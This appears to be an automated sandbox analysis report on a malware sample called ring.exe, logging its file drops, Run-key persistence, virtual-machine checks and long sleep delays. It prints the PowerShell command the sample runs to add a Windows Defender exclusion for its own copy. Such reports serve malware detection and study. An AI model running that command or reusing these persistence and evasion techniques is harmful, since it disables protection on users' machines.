Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: textshaping.dll	Jump to behavior

Source: C:\Users\user\Desktop\ring.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ring.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: ring.exe

Static file information: File size 17488384 > 1048576

Source: ring.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4a2400
Source: ring.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xb87600

Source: ring.exe

Static PE information: More than 200 imports for user32.dll

Source: ring.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: ring.exe	Static PE information: section name: .didata
Source: ring.exe.4.dr	Static PE information: section name: .didata

Source: C:\Users\user\Desktop\ring.exe

File created: C:\Users\user\AppData\Roaming\Win_24230\ring.exe

Jump to dropped file

Source: C:\Users\user\Desktop\ring.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinSesp			Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinSesp			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\ring.exe	File opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\VBoxHook.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	File opened / queried: C:\Windows\SysWOW64\Wbem\VBoxHook.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	File opened / queried: C:\Windows\system\VBoxHook.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	File opened / queried: C:\Windows\VBoxHook.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	File opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\VBoxHook.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	File opened / queried: C:\Windows\SysWOW64\OpenSSH\VBoxHook.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	File opened / queried: C:\Users\user\Desktop\VBoxHook.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	File opened / queried: \\\VBoxMiniRdrDN	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\VBoxHook.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	File opened / queried: C:\Windows\SysWOW64\VBoxHook.dll	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7319			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2374			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196	Thread sleep count: 7319 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7200	Thread sleep count: 2374 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7228	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: ring.exe, ring.exe.4.dr	Binary or memory string: VBoxHook.dllU
Source: ring.exe, 00000004.00000002.2527929541.0000000001B10000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT
Source: ring.exe, 00000004.00000002.2527929541.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, ring.exe, 00000004.00000002.2527929541.0000000001B10000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ring.exe.4.dr	Binary or memory string: VMWare
Source: ring.exe, 0000000D.00000003.1458057883.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, ring.exe, 0000000E.00000003.1536980330.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ring.exe, ring.exe.4.dr	Binary or memory string: \\\\.\\\VBoxMiniRdrDN

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\ring.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"
Source: C:\Users\user\Desktop\ring.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"	Jump to behavior

Source: C:\Users\user\Desktop\ring.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"			Jump to behavior

Source: ring.exe, 00000004.00000002.2529177771.00000000036A8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: ring.exe, 00000004.00000002.2529177771.00000000036A8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager@

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
